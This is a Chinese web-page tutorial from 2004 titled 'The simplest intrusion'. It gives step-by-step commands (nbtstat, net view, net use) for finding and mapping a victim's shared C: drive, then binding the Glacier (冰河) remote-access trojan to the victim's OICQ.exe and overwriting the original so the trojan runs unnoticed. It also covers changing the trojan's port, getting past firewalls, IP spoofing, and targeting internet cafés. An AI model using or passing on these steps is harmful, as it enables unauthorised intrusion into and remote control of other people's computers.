首页 电脑 电脑学堂 查看内容

最简单的入侵

2004-9-29 20:05 993 0

摘要: 首先需要得知对方的ip  可以用oicq来查对方ip,也可以在聊天室内查。  工具很多,随便都可以抓到一大把。  第二步,在命令提示符下(即,win9x的dos命令行下)...
关键词: nbsp 对方 xxx oicq 冰河 木马 命令 registered exe 提示符

首先需要得知对方的ip  可以用oicq来查对方ip,也可以在聊天室内查。  工具很多,随便都可以抓到一大把。  第二步,在命令提示符下(即,win9x的dos命令行下)  输入 nbtstat -A xxx.xxx.xxx.xxx  会得到如下提示信息:  NetBios remote machine name table  name __type _________status  clovea  unique registered  mmxxcc  group registered  clovea  unique registered  mac address = 00-00-00-00-00-00  这里就告诉了你对方的注册用户名,和主机名 均为clovea  mmxxcc为对方注册公司。  第三步,在命令提示符下输入,  net view \\xxx.xxx.xxx.xxx  这时会显示对方的共享资源。  比如  c xx c  说明对方的c盘是共享的。  第四步,接下来输入  net use z: \\xxx.xxx.xxx.xxx\c  这时,你的z:就成为对方c盘的应像了,可以直接用dos命令操作  如copy z:\program files\oicq.exe d:\oicq.exe  也可以到到windows界面,打开我的电脑,直接操作。  第5步,查明对方的常用软件,如oicq,winamp,等等  然后把对方的常用软件和木马进行捆绑,如把oicq.exe 和G_sever.exe(冰河2.2服务端)。  第6步,偷梁换柱,把你捆绑好了的oicq.exe覆盖对方的oicq.exe,这样对方每次用oicq的时候就不知不觉的运行了你的木马,嘿嘿。  第7步,等着你的冰河给你发mail吧,呵呵,不过大家最好还是别用冰河,冰河的万能密码太恐怖了,还有,默认的木马端口一定要记得改啊。  备注,如果对方拥有天网之内的防火墙的话,你是查不到对方的共享资源和信息的。  如果你已经成功的侵入,而又能肯定对方要装防火墙的话,请把木马端口限制在1024以下。  以上方法虽然是利用对方的错误配置等进攻,并且懂点安全知识的都不会共享自己的资源的,但是经我实验证实,有很多网吧为了方便,硬盘都是共享了的,如果对方有路由的话,就先用ip欺骗吧! 
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部